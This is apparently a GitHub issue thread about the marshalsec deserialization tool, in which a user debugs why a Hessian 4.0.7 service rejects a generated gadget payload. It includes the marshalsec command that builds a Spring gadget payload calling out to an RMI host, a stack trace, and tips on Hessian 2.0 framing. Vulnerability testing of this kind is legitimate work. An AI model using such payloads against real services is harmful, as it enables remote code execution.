Closed yahanvesh closed 4 years ago
The payload generated is a "raw" data stream (e.g. 0x4D is a map object), I guess your service may be expecting an additonal "envelope" e.g. headers or the RPC call wrapper. You should be able to find out what the service is expecting from the stacktrace. Then you could duplicate marshalsec.Hessian and overwrite HessianBase.marshal() to reflect whatever the service is expecting.
Here is the complete stacktrace:-
Apr 17, 2020 4:08:22 PM org.apache.catalina.core.StandardWrapperValve invoke
SEVERE: Servlet.service() for servlet [remoting] in context with path [/service] threw exception [Hessian skeleton invocation failed; nested exception is com.caucho.hessian.io.HessianProtocolException: expected string at 0x4d] with root cause
com.caucho.hessian.io.HessianProtocolException: expected string at 0x4d
at com.caucho.hessian.io.Hessian2Input.error(Hessian2Input.java:2882)
at com.caucho.hessian.io.Hessian2Input.expect(Hessian2Input.java:2830)
at com.caucho.hessian.io.Hessian2Input.readString(Hessian2Input.java:1362)
at com.caucho.hessian.io.Hessian2Input.readMethod(Hessian2Input.java:272)
at com.caucho.hessian.server.HessianSkeleton.invoke(HessianSkeleton.java:249)
at com.caucho.hessian.server.HessianSkeleton.invoke(HessianSkeleton.java:221)
at org.springframework.remoting.caucho.HessianExporter.doInvoke(HessianExporter.java:228)
at org.springframework.remoting.caucho.HessianExporter.invoke(HessianExporter.java:144)
at org.springframework.remoting.caucho.HessianServiceExporter.handleRequest(HessianServiceExporter.java:63)
at org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter.handle(HttpRequestHandlerAdapter.java:53)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1039)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:942)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1005)
at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:908)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:650)
at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:882)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at com.company.filter.CacheFilter.doFilter(CacheFilter.java:94)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:209)
at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:178)
at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:357)
at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:270)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at com.company.middleware.security.CsrfPreventionFilter.doFilter(CsrfPreventionFilter.java:166)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:494)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
at com.company.catalina.valves.CompanyAccessLogValve.invoke(CompanyAccessLogValve.java:218)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:445)
at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1137)
at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637)
at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:748)
Assuing https://github.com/sofastack/sofa-hessian/blob/537351cd10966804fca91b082ebe73c02dda1d73/src/main/java/com/caucho/hessian/server/HessianSkeleton.java#L225 is the correct code you can see what is expected:
<callhdr> <headers*> <method_name> <n> <arg_1> .. <arg_n>
Its actually this one - https://repo1.maven.org/maven2/com/caucho/hessian/4.0.7/ or the exact code http://kickjava.com/src/com/caucho/hessian/io/Hessian2Input.java.htm
Does it make sense to do something like this, just giving the payload with writeObject.
public interface Download {
public InputStream download(String filename, InputStream data){
//create your http connection and get the outputstream
OutputStream os = ....;
Hessian2Output out = new Hessian2Output(os);
out.writeObject(filename);
byte[] buffer = new byte[1024];
int c = -1;
while( (c = data.read(buf)) != -1) {
os.write(buf);
}
os.flush();
//.....
}
}
Looks like spring-aop is not on the classpath. I did a mvn dependency:build-classpath and did not find any of these classes SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin.
Can i confirm then its not vulnerable? @mbechler
Hey @mbechler Any suggestions. Thanks in advance.
I found that the payload i generated was in Hessian 1.0 but my service was taking Hessian 2.0. By changing the code to use Hessian2Input and Hessian2Output. I was able to get around the issue.
Issue Hessian service doesnt like the payload generated
Payload generation Command java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://x.x.x.x:1099 > rmi_payload
My Payload in Hex
Server Detail Hessian Server Version on my Server: 4.0.7
Looks like Hessian doesnt like the first byte 4d.
I get the following error when i use a python program to send the payload. (I do take care to prepend the H\x02\x02C bytes at the begining of the payload)
@mbechler Any suggestions?